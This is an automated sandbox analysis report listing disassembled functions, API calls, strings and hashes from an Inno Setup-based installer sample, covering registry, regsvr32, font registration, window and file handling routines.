                                                                  • Associated: 00000003.00000002.3047705339.000000000049A000.00000008.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3047737646.000000000049B000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3047772691.00000000004AB000.00000002.00000001.01000000.00000006.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_400000_NqISs1vOr.jbxd
                                                                  Similarity
                                                                  • API ID: CloseHandleProcess$CodeExitObjectSingleSleepTerminateWait
                                                                  • String ID: Helper isn't responding; killing it.$Helper process exited with failure code: 0x%x$Helper process exited, but failed to get exit code.$Helper process exited.$Stopping 64-bit helper process. (PID: %u)
                                                                  APIs
                                                                    • Part of subcall function 0042DDDC: RegCreateKeyExA.ADVAPI32(?,?,?,?,?,?,?,?,?), ref: 0042DE08
                                                                  • RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,?,00000000,004546D3,?,00000000,00454797), ref: 00454623
                                                                  • RegCloseKey.ADVAPI32(?,?,?,00000000,00000004,00000000,00000001,?,00000000,?,00000000,004546D3,?,00000000,00454797), ref: 0045475F
                                                                    • Part of subcall function 0042E8C0: FormatMessageA.KERNEL32(00003200,00000000,4C783AFB,00000000,?,00000400,00000000,?,00453247,00000000,kernel32.dll,Wow64RevertWow64FsRedirection,00000000,kernel32.dll,Wow64DisableWow64FsRedirection,00000000), ref: 0042E8DF
                                                                  Strings
                                                                  • , xrefs: 00454585
                                                                  • Software\Microsoft\Windows\CurrentVersion\SharedDLLs, xrefs: 0045453B
                                                                  • RegCreateKeyEx, xrefs: 00454597
                                                                  • Software\Microsoft\Windows\CurrentVersion\SharedDLLs, xrefs: 0045456B
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3047602013.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000003.00000002.3047575301.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3047680147.0000000000499000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3047705339.000000000049A000.00000008.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3047737646.000000000049B000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3047772691.00000000004AB000.00000002.00000001.01000000.00000006.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_400000_NqISs1vOr.jbxd
                                                                  Similarity
                                                                  • API ID: CloseCreateFormatMessageQueryValue
                                                                  • String ID: $RegCreateKeyEx$Software\Microsoft\Windows\CurrentVersion\SharedDLLs$Software\Microsoft\Windows\CurrentVersion\SharedDLLs
                                                                  APIs
                                                                    • Part of subcall function 00453890: CreateFileA.KERNEL32(00000000,C0000000,00000000,00000000,00000002,00000080,00000000,.tmp,-cI,_iu,?,00000000,004539CA), ref: 0045397F
                                                                    • Part of subcall function 00453890: CloseHandle.KERNEL32(00000000,00000000,C0000000,00000000,00000000,00000002,00000080,00000000,.tmp,-cI,_iu,?,00000000,004539CA), ref: 0045398F
                                                                  • CopyFileA.KERNEL32(00000000,00000000,00000000), ref: 004961D9
                                                                  • SetFileAttributesA.KERNEL32(00000000,00000080,00000000,0049632D), ref: 004961FA
                                                                  • CreateWindowExA.USER32(00000000,STATIC,0049633C,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00400000,00000000), ref: 00496221
                                                                  • SetWindowLongA.USER32(?,000000FC,004959B4), ref: 00496234
                                                                  • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000097,00000000,00496300,?,?,000000FC,004959B4,00000000,STATIC,0049633C), ref: 00496264
                                                                  • MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000000FF), ref: 004962D8
                                                                  • CloseHandle.KERNEL32(?,?,?,00000000,00000000,00000000,00000000,00000000,00000097,00000000,00496300,?,?,000000FC,004959B4,00000000), ref: 004962E4
                                                                    • Part of subcall function 00453D04: WritePrivateProfileStringA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00453DEB
                                                                  • 73A25CF0.USER32(?,00496307,00000000,00000000,00000000,00000000,00000000,00000097,00000000,00496300,?,?,000000FC,004959B4,00000000,STATIC), ref: 004962FA
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3047602013.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000003.00000002.3047575301.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3047680147.0000000000499000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3047705339.000000000049A000.00000008.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3047737646.000000000049B000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3047772691.00000000004AB000.00000002.00000001.01000000.00000006.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_400000_NqISs1vOr.jbxd
                                                                  Similarity
                                                                  • API ID: FileWindow$CloseCreateHandle$AttributesCopyLongMultipleObjectsPrivateProfileStringWaitWrite
                                                                  • String ID: /SECONDPHASE="%s" /FIRSTPHASEWND=$%x $STATIC
                                                                  APIs
                                                                  • GetModuleHandleA.KERNEL32(kernel32.dll,GetUserDefaultUILanguage,00000000,0042E515,?,00000000,0047DD24,00000000), ref: 0042E439
                                                                  • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 0042E43F
                                                                  • RegCloseKey.ADVAPI32(00000000,00000000,00000001,00000000,00000000,kernel32.dll,GetUserDefaultUILanguage,00000000,0042E515,?,00000000,0047DD24,00000000), ref: 0042E48D
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3047602013.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000003.00000002.3047575301.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3047680147.0000000000499000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3047705339.000000000049A000.00000008.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3047737646.000000000049B000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3047772691.00000000004AB000.00000002.00000001.01000000.00000006.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_400000_NqISs1vOr.jbxd
                                                                  Similarity
                                                                  • API ID: AddressCloseHandleModuleProc
                                                                  • String ID: %aE$.DEFAULT\Control Panel\International$Control Panel\Desktop\ResourceLocale$GetUserDefaultUILanguage$Locale$kernel32.dll
                                                                  APIs
                                                                  • GetActiveWindow.USER32 ref: 00462824
                                                                  • GetModuleHandleA.KERNEL32(user32.dll), ref: 00462838
                                                                  • GetProcAddress.KERNEL32(00000000,MonitorFromWindow), ref: 00462845
                                                                  • GetProcAddress.KERNEL32(00000000,GetMonitorInfoA), ref: 00462852
                                                                  • GetWindowRect.USER32(?,00000000), ref: 0046289E
                                                                  • SetWindowPos.USER32(?,00000000,?,?,00000000,00000000,0000001D,?,00000000), ref: 004628DC
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3047602013.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  Similarity
                                                                  • API ID: Window$AddressProc$ActiveHandleModuleRect
                                                                  • String ID: ($GetMonitorInfoA$MonitorFromWindow$user32.dll
                                                                  • API String ID: 2610873146-3407710046
                                                                  • Opcode ID: 1a12ae3bf6497ff777cd16400bb62bc7ce249fae767d1011b5c9c7ae1396f400
                                                                  • Instruction ID: 4c37a186de2a83ca6a9e6f1427afc5cce354ac5e92891655707437263646b99d
                                                                  • Opcode Fuzzy Hash: 1a12ae3bf6497ff777cd16400bb62bc7ce249fae767d1011b5c9c7ae1396f400
                                                                  • Instruction Fuzzy Hash: 8621C571700B006BD310E664DD41F3B3798EB84710F08063AF984DB3D2EAB8EC008B9A
                                                                  APIs
                                                                  • GetActiveWindow.USER32 ref: 0042F18C
                                                                  • GetModuleHandleA.KERNEL32(user32.dll), ref: 0042F1A0
                                                                  • GetProcAddress.KERNEL32(00000000,MonitorFromWindow), ref: 0042F1AD
                                                                  • GetProcAddress.KERNEL32(00000000,GetMonitorInfoA), ref: 0042F1BA
                                                                  • GetWindowRect.USER32(?,00000000), ref: 0042F206
                                                                  • SetWindowPos.USER32(?,00000000,?,?,00000000,00000000,0000001D), ref: 0042F244
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3047602013.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  Similarity
                                                                  • API ID: Window$AddressProc$ActiveHandleModuleRect
                                                                  • String ID: ($GetMonitorInfoA$MonitorFromWindow$user32.dll
                                                                  • API String ID: 2610873146-3407710046
                                                                  • Opcode ID: f060aae0b7a5edf3cc9df1b8e2ac1156138d1c343137e24e009784064c48acd9
                                                                  • Instruction ID: fe4b6ce3f65a79f89e9c436b8398c0b3b6e1cac74b3897b930778965e8aa8e9e
                                                                  • Opcode Fuzzy Hash: f060aae0b7a5edf3cc9df1b8e2ac1156138d1c343137e24e009784064c48acd9
                                                                  • Instruction Fuzzy Hash: 8A21D479300710ABD700D668EC81F3B36E8EB85710F88457AF944DB3C1DA79EC048BA9
                                                                  APIs
                                                                  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,00458C1B,?,00000000,00458C7E,?,?,02213858,00000000), ref: 00458A99
                                                                  • TransactNamedPipe.KERNEL32(?,-00000020,0000000C,-00004034,00000014,02213858,?,00000000,00458BB0,?,00000000,00000001,00000000,00000000,00000000,00458C1B), ref: 00458AF6
                                                                  • GetLastError.KERNEL32(?,-00000020,0000000C,-00004034,00000014,02213858,?,00000000,00458BB0,?,00000000,00000001,00000000,00000000,00000000,00458C1B), ref: 00458B03
                                                                  • MsgWaitForMultipleObjects.USER32(00000001,00000000,00000000,000000FF,000000FF), ref: 00458B4F
                                                                  • GetOverlappedResult.KERNEL32(?,?,00000000,00000001,00458B89,?,-00000020,0000000C,-00004034,00000014,02213858,?,00000000,00458BB0,?,00000000), ref: 00458B75
                                                                  • GetLastError.KERNEL32(?,?,00000000,00000001,00458B89,?,-00000020,0000000C,-00004034,00000014,02213858,?,00000000,00458BB0,?,00000000), ref: 00458B7C
                                                                    • Part of subcall function 00453470: GetLastError.KERNEL32(00000000,00454005,00000005,00000000,0045403A,?,?,00000000,0049B628,00000004,00000000,00000000,00000000,?,004978B1,00000000), ref: 00453473
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3047602013.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  Similarity
                                                                  • API ID: ErrorLast$CreateEventMultipleNamedObjectsOverlappedPipeResultTransactWait
                                                                  • String ID: CreateEvent$TransactNamedPipe
                                                                  • API String ID: 2182916169-3012584893
                                                                  • Opcode ID: 893ade2b7d25531ff66c13e68608fa62c4cd61168c1a2b8304732b74ac398c25
                                                                  • Instruction ID: 8abbb299140198d1acf2f300c186b6d7a0c7583c2a92940a340f901db1703015
                                                                  • Opcode Fuzzy Hash: 893ade2b7d25531ff66c13e68608fa62c4cd61168c1a2b8304732b74ac398c25
                                                                  • Instruction Fuzzy Hash: D4418771A00608EFDB15DF95CD81F9EB7F8EB48714F10406AF904F7292DA789E44CA28
                                                                  APIs
                                                                  • GetModuleHandleA.KERNEL32(OLEAUT32.DLL,UnRegisterTypeLib,00000000,00456CA5,?,?,00000031,?), ref: 00456B68
                                                                  • GetProcAddress.KERNEL32(00000000,OLEAUT32.DLL), ref: 00456B6E
                                                                  • LoadTypeLib.OLEAUT32(00000000,?), ref: 00456BBB
                                                                    • Part of subcall function 00453470: GetLastError.KERNEL32(00000000,00454005,00000005,00000000,0045403A,?,?,00000000,0049B628,00000004,00000000,00000000,00000000,?,004978B1,00000000), ref: 00453473
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3047602013.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  Similarity
                                                                  • API ID: AddressErrorHandleLastLoadModuleProcType
                                                                  • String ID: GetProcAddress$ITypeLib::GetLibAttr$LoadTypeLib$OLEAUT32.DLL$UnRegisterTypeLib$UnRegisterTypeLib
                                                                  • API String ID: 1914119943-2711329623
                                                                  • Opcode ID: 429f9213fdce0867704162136d35381b6641e802cf297fe1828a7e481cb37b2a
                                                                  • Instruction ID: 90c7a9fdd6b9eff4f50a7868ac1bc5a0a48bbd230e3c9f86fc21845b06ed4ed7
                                                                  • Opcode Fuzzy Hash: 429f9213fdce0867704162136d35381b6641e802cf297fe1828a7e481cb37b2a
                                                                  • Instruction Fuzzy Hash: 1B31B271A00A04AF9702EFAACC51D5BB7BDEB89746752846AFC04D3752DA38DD04C768
                                                                  APIs
                                                                  • RectVisible.GDI32(?,?), ref: 00416E0B
                                                                  • SaveDC.GDI32(?), ref: 00416E1F
                                                                  • IntersectClipRect.GDI32(?,00000000,00000000,?,?), ref: 00416E42
                                                                  • RestoreDC.GDI32(?,?), ref: 00416E5D
                                                                  • CreateSolidBrush.GDI32(00000000), ref: 00416EDD
                                                                  • FrameRect.USER32(?,?,?), ref: 00416F10
                                                                  • DeleteObject.GDI32(?), ref: 00416F1A
                                                                  • CreateSolidBrush.GDI32(00000000), ref: 00416F2A
                                                                  • FrameRect.USER32(?,?,?), ref: 00416F5D
                                                                  • DeleteObject.GDI32(?), ref: 00416F67
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3047602013.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  Similarity
                                                                  • API ID: Rect$BrushCreateDeleteFrameObjectSolid$ClipIntersectRestoreSaveVisible
                                                                  • String ID:
                                                                  • API String ID: 375863564-0
                                                                  • Opcode ID: 4f2037b5eabd4c0ddd7adb5546328da8476fa2c27bed59ce0fc3228c4463e070
                                                                  • Instruction ID: 3aa003abb57efcc62207c922e0442432c52dbc4458161ac97ea4a6727b5fec63
                                                                  • Opcode Fuzzy Hash: 4f2037b5eabd4c0ddd7adb5546328da8476fa2c27bed59ce0fc3228c4463e070
                                                                  • Instruction Fuzzy Hash: 7F512B716086459FDB50EF29C8C0B9777E8AF48314F15466ABD889B287C738EC81CB99
                                                                  APIs
                                                                  • CreateFileA.KERNEL32(00000000,80000000,00000002,00000000,00000003,00000080,00000000), ref: 00404B46
                                                                  • GetFileSize.KERNEL32(?,00000000,00000000,80000000,00000002,00000000,00000003,00000080,00000000), ref: 00404B6A
                                                                  • SetFilePointer.KERNEL32(?,-00000080,00000000,00000000,?,00000000,00000000,80000000,00000002,00000000,00000003,00000080,00000000), ref: 00404B86
                                                                  • ReadFile.KERNEL32(?,?,00000080,?,00000000,00000000,?,-00000080,00000000,00000000,?,00000000,00000000,80000000,00000002,00000000), ref: 00404BA7
                                                                  • SetFilePointer.KERNEL32(?,00000000,00000000,00000002), ref: 00404BD0
                                                                  • SetEndOfFile.KERNEL32(?,?,00000000,00000000,00000002), ref: 00404BDA
                                                                  • GetStdHandle.KERNEL32(000000F5), ref: 00404BFA
                                                                  • GetFileType.KERNEL32(?,000000F5), ref: 00404C11
                                                                  • CloseHandle.KERNEL32(?,?,000000F5), ref: 00404C2C
                                                                  • GetLastError.KERNEL32(000000F5), ref: 00404C46
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3047602013.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  Similarity
                                                                  • API ID: File$HandlePointer$CloseCreateErrorLastReadSizeType
                                                                  • String ID:
                                                                  • API String ID: 1694776339-0
                                                                  • Opcode ID: 9f56c7289f94e04900e6d065ddfea074988f08e379b72121dafcd5ad7d79337d
                                                                  • Instruction ID: 0555156f4d2a620bb114dc01d937536d57074fdea11cd86abdfeb4dd56d828b4
                                                                  • Opcode Fuzzy Hash: 9f56c7289f94e04900e6d065ddfea074988f08e379b72121dafcd5ad7d79337d
                                                                  • Instruction Fuzzy Hash: 3741B3F02093009AF7305E248905B2375E5EBC0755F208E3FE296BA6E0D7BDE8458B1D
                                                                  APIs
                                                                  • GetSystemMenu.USER32(00000000,00000000), ref: 0042222B
                                                                  • DeleteMenu.USER32(00000000,0000F130,00000000,00000000,00000000), ref: 00422249
                                                                  • DeleteMenu.USER32(00000000,00000007,00000400,00000000,0000F130,00000000,00000000,00000000), ref: 00422256
                                                                  • DeleteMenu.USER32(00000000,00000005,00000400,00000000,00000007,00000400,00000000,0000F130,00000000,00000000,00000000), ref: 00422263
                                                                  • DeleteMenu.USER32(00000000,0000F030,00000000,00000000,00000005,00000400,00000000,00000007,00000400,00000000,0000F130,00000000,00000000,00000000), ref: 00422270
                                                                  • DeleteMenu.USER32(00000000,0000F020,00000000,00000000,0000F030,00000000,00000000,00000005,00000400,00000000,00000007,00000400,00000000,0000F130,00000000,00000000), ref: 0042227D
                                                                  • DeleteMenu.USER32(00000000,0000F000,00000000,00000000,0000F020,00000000,00000000,0000F030,00000000,00000000,00000005,00000400,00000000,00000007,00000400,00000000), ref: 0042228A
                                                                  • DeleteMenu.USER32(00000000,0000F120,00000000,00000000,0000F000,00000000,00000000,0000F020,00000000,00000000,0000F030,00000000,00000000,00000005,00000400,00000000), ref: 00422297
                                                                  • EnableMenuItem.USER32(00000000,0000F020,00000001), ref: 004222B5
                                                                  • EnableMenuItem.USER32(00000000,0000F030,00000001), ref: 004222D1
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3047602013.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  Similarity
                                                                  • API ID: Menu$Delete$EnableItem$System
                                                                  • String ID:
                                                                  • API String ID: 3985193851-0
                                                                  • Opcode ID: 5abdbd2448cd02f00dbd9e0a18e72027fb78d1268677703bf36b2e23ad6afd93
                                                                  • Instruction ID: 3d512aed001548988d9f6823c75d43677a46120aeb5bb01c9b252fa7414fdf33
                                                                  • Opcode Fuzzy Hash: 5abdbd2448cd02f00dbd9e0a18e72027fb78d1268677703bf36b2e23ad6afd93
                                                                  • Instruction Fuzzy Hash: 692144703407447AE720E724DD8BFABBBD8AB04708F1455A5B6487F6D3C2F9AB804698
                                                                  APIs
                                                                  • FreeLibrary.KERNEL32(10000000), ref: 00480FD5
                                                                  • FreeLibrary.KERNEL32(00000000), ref: 00480FE9
                                                                  • SendNotifyMessageA.USER32(000403E6,00000496,00002710,00000000), ref: 0048105B
                                                                  Strings
                                                                  • Restarting Windows., xrefs: 00481036
                                                                  • Not restarting Windows because Setup is being run from the debugger., xrefs: 0048100A
                                                                  • Deinitializing Setup., xrefs: 00480E36
                                                                  • GetCustomSetupExitCode, xrefs: 00480E75
                                                                  • DeinitializeSetup, xrefs: 00480ED1
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3047602013.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  Similarity
                                                                  • API ID: FreeLibrary$MessageNotifySend
                                                                  • String ID: DeinitializeSetup$Deinitializing Setup.$GetCustomSetupExitCode$Not restarting Windows because Setup is being run from the debugger.$Restarting Windows.
                                                                  • API String ID: 3817813901-1884538726
                                                                  • Opcode ID: aeb7eeed0520e5db2a06f6f9575c7ce6fe4ce849ef8be63e157f84bdb35f0c9d
                                                                  • Instruction ID: 3a7bead0d2027120b4b43806ed62f13ca717c16daae07b60498e62be9a129c9c
                                                                  • Opcode Fuzzy Hash: aeb7eeed0520e5db2a06f6f9575c7ce6fe4ce849ef8be63e157f84bdb35f0c9d
                                                                  • Instruction Fuzzy Hash: 6E5191307042409FD711EB65D9A5B6E77E8EB5A304F50887BF900D73A2CB38A849CB9D
                                                                  APIs
                                                                  • SHGetMalloc.SHELL32(?), ref: 004614EF
                                                                  • GetActiveWindow.USER32 ref: 00461553
                                                                  • CoInitialize.OLE32(00000000), ref: 00461567
                                                                  • SHBrowseForFolder.SHELL32(?), ref: 0046157E
                                                                  • CoUninitialize.OLE32(004615BF,00000000,?,?,?,?,?,00000000,00461643), ref: 00461593
                                                                  • SetActiveWindow.USER32(?,004615BF,00000000,?,?,?,?,?,00000000,00461643), ref: 004615A9
                                                                  • SetActiveWindow.USER32(?,?,004615BF,00000000,?,?,?,?,?,00000000,00461643), ref: 004615B2
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3047602013.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  Similarity
                                                                  • API ID: ActiveWindow$BrowseFolderInitializeMallocUninitialize
                                                                  • String ID: A
                                                                  APIs
                                                                  • GetFileAttributesA.KERNEL32(00000000,00000000,004728A1,?,?,?,00000008,00000000,00000000,00000000,?,00472AFD,?,?,00000000,00472D6C), ref: 00472804
                                                                    • Part of subcall function 0042CD8C: GetPrivateProfileStringA.KERNEL32(00000000,00000000,00000000,00000000,00000100,00000000), ref: 0042CE02
                                                                    • Part of subcall function 00406F40: DeleteFileA.KERNEL32(00000000,0049B628,00497BFD,00000000,00497C52,?,?,00000005,?,00000000,00000000,00000000,Inno-Setup-RegSvr-Mutex,?,00000005,00000000), ref: 00406F4B
                                                                  • SetFileAttributesA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,004728A1,?,?,?,00000008,00000000,00000000,00000000,?,00472AFD), ref: 0047287B
                                                                  • RemoveDirectoryA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,004728A1,?,?,?,00000008,00000000,00000000,00000000), ref: 00472881
                                                                  Strings
                                                                  Similarity
                                                                  • API ID: File$Attributes$DeleteDirectoryPrivateProfileRemoveString
                                                                  • String ID: .ShellClassInfo$CLSID2$desktop.ini$target.lnk${0AFACED1-E828-11D1-9187-B532F1E9575D}
                                                                  APIs
                                                                  • GetProcAddress.KERNEL32(00000000,inflateInit_), ref: 0045D0DD
                                                                  • GetProcAddress.KERNEL32(00000000,inflate), ref: 0045D0ED
                                                                  • GetProcAddress.KERNEL32(00000000,inflateEnd), ref: 0045D0FD
                                                                  • GetProcAddress.KERNEL32(00000000,inflateReset), ref: 0045D10D
                                                                  Strings
                                                                  Similarity
                                                                  • API ID: AddressProc
                                                                  • String ID: inflate$inflateEnd$inflateInit_$inflateReset
                                                                  APIs
                                                                  • SetBkColor.GDI32(?,00000000), ref: 0041A9B1
                                                                  • 73A24D40.GDI32(?,00000000,00000000,?,?,?,00000000,00000000,00CC0020,?,00000000), ref: 0041A9EB
                                                                  • SetBkColor.GDI32(?,?), ref: 0041AA00
                                                                  • StretchBlt.GDI32(00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,00CC0020), ref: 0041AA4A
                                                                  • SetTextColor.GDI32(00000000,00000000), ref: 0041AA55
                                                                  • SetBkColor.GDI32(00000000,00FFFFFF), ref: 0041AA65
                                                                  • StretchBlt.GDI32(00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,00E20746), ref: 0041AAA4
                                                                  • SetTextColor.GDI32(00000000,00000000), ref: 0041AAAE
                                                                  • SetBkColor.GDI32(00000000,?), ref: 0041AABB
                                                                  Similarity
                                                                  • API ID: Color$StretchText
                                                                  • String ID:
                                                                  APIs
                                                                    • Part of subcall function 0042D8BC: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 0042D8CF
                                                                  • CloseHandle.KERNEL32(?,?,00000044,00000000,00000000,04000000,00000000,00000000,00000000,00458098,?, /s ",?,regsvr32.exe",?,00458098), ref: 0045800A
                                                                  Strings
                                                                  Similarity
                                                                  • API ID: CloseDirectoryHandleSystem
                                                                  • String ID: /s "$ /u$0x%x$CreateProcess$D$Spawning 32-bit RegSvr32: $Spawning 64-bit RegSvr32: $regsvr32.exe"
                                                                  APIs
                                                                  • OffsetRect.USER32(?,00000001,00000001), ref: 0044D1A1
                                                                  • GetSysColor.USER32(00000014), ref: 0044D1A8
                                                                  • SetTextColor.GDI32(00000000,00000000), ref: 0044D1C0
                                                                  • DrawTextA.USER32(00000000,00000000,00000000), ref: 0044D1E9
                                                                  • OffsetRect.USER32(?,000000FF,000000FF), ref: 0044D1F3
                                                                  • GetSysColor.USER32(00000010), ref: 0044D1FA
                                                                  • SetTextColor.GDI32(00000000,00000000), ref: 0044D212
                                                                  • DrawTextA.USER32(00000000,00000000,00000000), ref: 0044D23B
                                                                  • DrawTextA.USER32(00000000,00000000,00000000), ref: 0044D266
                                                                  Similarity
                                                                  • API ID: Text$Color$Draw$OffsetRect
                                                                  • String ID:
                                                                  APIs
                                                                    • Part of subcall function 00450900: SetEndOfFile.KERNEL32(?,?,0045C162,00000000,0045C2ED,?,00000000,00000002,00000002), ref: 00450907
                                                                    • Part of subcall function 00406F40: DeleteFileA.KERNEL32(00000000,0049B628,00497BFD,00000000,00497C52,?,?,00000005,?,00000000,00000000,00000000,Inno-Setup-RegSvr-Mutex,?,00000005,00000000), ref: 00406F4B
                                                                  • GetWindowThreadProcessId.USER32(00000000,?), ref: 00495A91
                                                                  • OpenProcess.KERNEL32(00100000,00000000,?,00000000,?), ref: 00495AA5
                                                                  • SendNotifyMessageA.USER32(00000000,0000054D,00000000,00000000), ref: 00495ABF
                                                                  • WaitForSingleObject.KERNEL32(00000000,000000FF,00000000,0000054D,00000000,00000000,00000000,?), ref: 00495ACB
                                                                  • CloseHandle.KERNEL32(00000000,00000000,000000FF,00000000,0000054D,00000000,00000000,00000000,?), ref: 00495AD1
                                                                  • Sleep.KERNEL32(000001F4,00000000,0000054D,00000000,00000000,00000000,?), ref: 00495AE4
                                                                  Strings
                                                                  • Deleting Uninstall data files., xrefs: 00495A07
                                                                  Similarity
                                                                  • API ID: FileProcess$CloseDeleteHandleMessageNotifyObjectOpenSendSingleSleepThreadWaitWindow
                                                                  • String ID: Deleting Uninstall data files.
                                                                  APIs
                                                                    • Part of subcall function 0042DE14: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,0048319F,?,00000001,?,?,0048319F,?,00000001,00000000), ref: 0042DE30
                                                                  • RegSetValueExA.ADVAPI32(?,00000000,00000000,00000001,00000000,00000001,?,00000002,00000000,00000000,00470119,?,?,?,?,00000000), ref: 00470083
                                                                  • RegCloseKey.ADVAPI32(?,?,00000000,00000000,00000001,00000000,00000001,?,00000002,00000000,00000000,00470119), ref: 0047009A
                                                                  • AddFontResourceA.GDI32(00000000), ref: 004700B7
                                                                  • SendNotifyMessageA.USER32(0000FFFF,0000001D,00000000,00000000), ref: 004700CB
                                                                  Strings
                                                                  • AddFontResource, xrefs: 004700D5
                                                                  • Failed to set value in Fonts registry key., xrefs: 0047008C
                                                                  • Failed to open Fonts registry key., xrefs: 004700A1
                                                                  Similarity
                                                                  • API ID: CloseFontMessageNotifyOpenResourceSendValue
                                                                  • String ID: AddFontResource$Failed to open Fonts registry key.$Failed to set value in Fonts registry key.
                                                                  APIs
                                                                    • Part of subcall function 00416408: GetClassInfoA.USER32(00400000,?,?), ref: 00416477
                                                                    • Part of subcall function 00416408: UnregisterClassA.USER32(?,00400000), ref: 004164A3
                                                                    • Part of subcall function 00416408: RegisterClassA.USER32(?), ref: 004164C6
                                                                  • GetVersion.KERNEL32 ref: 00462C88
                                                                  • SendMessageA.USER32(00000000,0000112C,00000004,00000004), ref: 00462CC6
                                                                  • SHGetFileInfo.SHELL32(00462D64,00000000,?,00000160,00004011), ref: 00462CE3
                                                                  • LoadCursorA.USER32(00000000,00007F02), ref: 00462D01
                                                                  • SetCursor.USER32(00000000,00000000,00007F02,00462D64,00000000,?,00000160,00004011), ref: 00462D07
                                                                  • SetCursor.USER32(?,00462D47,00007F02,00462D64,00000000,?,00000160,00004011), ref: 00462D3A
                                                                  Strings
                                                                  Similarity
                                                                  • API ID: ClassCursor$Info$FileLoadMessageRegisterSendUnregisterVersion
                                                                  • String ID: Explorer
                                                                  APIs
                                                                  • GetModuleHandleA.KERNEL32(kernel32.dll,GetFinalPathNameByHandleA,02212BEC,?,?,?,02212BEC,00477FC8,00000000,004780E6,?,?,-00000010,?), ref: 00477E1D
                                                                  • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00477E23
                                                                  • GetFileAttributesA.KERNEL32(00000000,00000000,kernel32.dll,GetFinalPathNameByHandleA,02212BEC,?,?,?,02212BEC,00477FC8,00000000,004780E6,?,?,-00000010,?), ref: 00477E36
                                                                  • CreateFileA.KERNEL32(00000000,00000000,00000007,00000000,00000003,00000000,00000000,00000000,00000000,kernel32.dll,GetFinalPathNameByHandleA,02212BEC,?,?,?,02212BEC), ref: 00477E60
                                                                  • CloseHandle.KERNEL32(00000000,?,?,?,02212BEC,00477FC8,00000000,004780E6,?,?,-00000010,?), ref: 00477E7E
                                                                  Strings
                                                                  Similarity
                                                                  • API ID: FileHandle$AddressAttributesCloseCreateModuleProc
                                                                  • String ID: GetFinalPathNameByHandleA$kernel32.dll
                                                                  APIs
                                                                  • RtlEnterCriticalSection.KERNEL32(0049B420,00000000,00401B68), ref: 00401ABD
                                                                  • LocalFree.KERNEL32(00592898,00000000,00401B68), ref: 00401ACF
                                                                  • VirtualFree.KERNEL32(?,00000000,00008000,00592898,00000000,00401B68), ref: 00401AEE
                                                                  • LocalFree.KERNEL32(00593898,?,00000000,00008000,00592898,00000000,00401B68), ref: 00401B2D
